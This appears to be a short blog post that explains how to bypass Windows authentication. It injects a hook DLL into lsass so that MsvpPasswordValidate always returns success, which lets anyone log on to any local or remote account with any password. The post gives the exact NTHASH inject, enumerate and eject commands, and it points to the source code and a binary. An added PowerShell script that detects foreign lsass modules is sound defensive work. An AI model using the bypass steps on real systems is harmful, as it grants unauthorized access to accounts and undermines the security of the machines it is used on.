In a previous post, we hooked RtlCompareMemory so that we could log on with a hardcoded password.
But this was limited to local accounts and to a single password.
This time, let's hook MsvpPasswordValidate, make it always return 1, and log on with any account (local or remote) and any password.
How to proceed:
- Retrieve the pid of lsass: nthash-win64 /enumproc | findstr lsass
- NTHASH-win64.exe /inject /pid:808 /binary:c:\temp\hook-win64.dll
- Optionally, check that our dll has been injected: NTHASH-win64.exe /enummod /pid:808 | findstr hook
- Test with runas /user:Admin cmd, or log on remotely (provide any password): you win!
- NTHASH-win64.exe /eject /pid:808 /binary:hook-win64.dll
- Optionally, check that our dll has been ejected: NTHASH-win64.exe /enummod /pid:808 | findstr hook
Source code and binary here.
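From the defender's side, the injection above leaves a foreign module loaded in lsass, which is exactly what the /enummod step confirms. The following PowerShell check is an added example (not code from the post or from the NTHASH tool): it lists every module loaded in lsass.exe and flags any that lives outside the Windows directory or does not carry a valid Microsoft Authenticode signature. It assumes an elevated prompt and that lsass is not running as a protected process (RunAsPPL), which would block both this enumeration and the injection itself.

```powershell
# Added example: audit the modules loaded in lsass.exe and report anything
# that does not look like a signed Microsoft component. Run elevated.
$lsass  = Get-Process -Name lsass -ErrorAction Stop
$winDir = [System.Environment]::GetFolderPath('Windows')

foreach ($m in $lsass.Modules) {
    $path    = $m.FileName
    $reasons = @()

    # A DLL injected from c:\temp (as in the post) fails this location check.
    if (-not $path.StartsWith($winDir, [System.StringComparison]::OrdinalIgnoreCase)) {
        $reasons += 'outside Windows directory'
    }

    # Legitimate lsass modules are Microsoft-signed (embedded or catalog signature).
    $sig = Get-AuthenticodeSignature -FilePath $path
    if ($sig.Status -ne 'Valid') {
        $reasons += "signature status: $($sig.Status)"
    } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        $reasons += "unexpected signer: $($sig.SignerCertificate.Subject)"
    }

    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            Module = $m.ModuleName
            Path   = $path
            Reason = ($reasons -join '; ')
        }
    }
}
```

An empty result means every lsass module is a Microsoft-signed file under the Windows directory; any row returned deserves a closer look, and the injected hook-win64.dll from the steps above would appear here until it is ejected.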